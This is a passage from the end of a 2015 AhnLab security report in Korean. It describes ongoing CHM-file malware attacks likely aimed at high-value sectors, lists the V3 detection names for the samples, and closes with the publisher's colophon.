리 문자열 그리고 랜덤 HTTP 헤더 조합 코드의 존재 여부를 비교했을
때 파일 간에는 유사성이 있는 것으로 추정된다. 적당한 시간 간격으
로 꾸준히 접수되고 있고 최근까지도 관련 테스트 파일이 수집된 것
으로 보아 연관성을 의심해볼 만하다.
조금 더 넓게 본다면 이런 가능성이 하나로 묶여 특정 그룹이나 대상
이 관련 악성코드를 생성하고 있는 것은 아닌지 의심해 볼 수 있다.
이처럼 CHM을 이용한 해킹 시도는 계속되고 있다. 보안, 국방, 외교
등 중요도가 높거나 공격 대상 또한 중요도가 높은 대상일 가능성이
높으며, 해당 악성코드가 실행되면 C&C 서버에서 원격 명령을 그대로
실행할 수 있어 감염 시 2차 피해가 우려되므로 사용자의 각별한 주의
가 필요하다.
V3 제품군에서는 관련 악성코드를 다음과 같이 진단하고 있다.
<V3 제품군의 진단명>
Dropper/Rctl (2015.03.17.00)
Trojan/Win32.RCtl (2015.03.20.05)
발행인 : 권치중
발행처 : 주식회사 안랩
경기도 성남시 분당구 판교역로 220
T. 031-722-8000 F. 031-722-8901
편집인 : 안랩 콘텐츠기획팀
디자인 : 안랩 UX디자인팀
© 2015 AhnLab, Inc. All rights reserved.
본 간행물의 어떤 부분도 안랩의 서면 동의 없이 복제, 복사, 검색 시스템
으로 저장 또는 전송될 수 없습니다. 안랩, 안랩 로고는 안랩의 등록상표입
니다. 그 외 다른 제품 또는 회사 이름은 해당 소유자의 상표 또는 등록상
표일 수 있습니다. 본 문서에 수록된 정보는 고지없이 변경될 수 있습니다.
경기도 성남시 분당구 판교역로 220
T. 031-722-8000 F. 031-722-8901
© 2015 AhnLab, Inc. All rights reserved.
http://www.ahnlab.com
http://blog.ahnlab.com
http://twitter.com/ahnlab_man
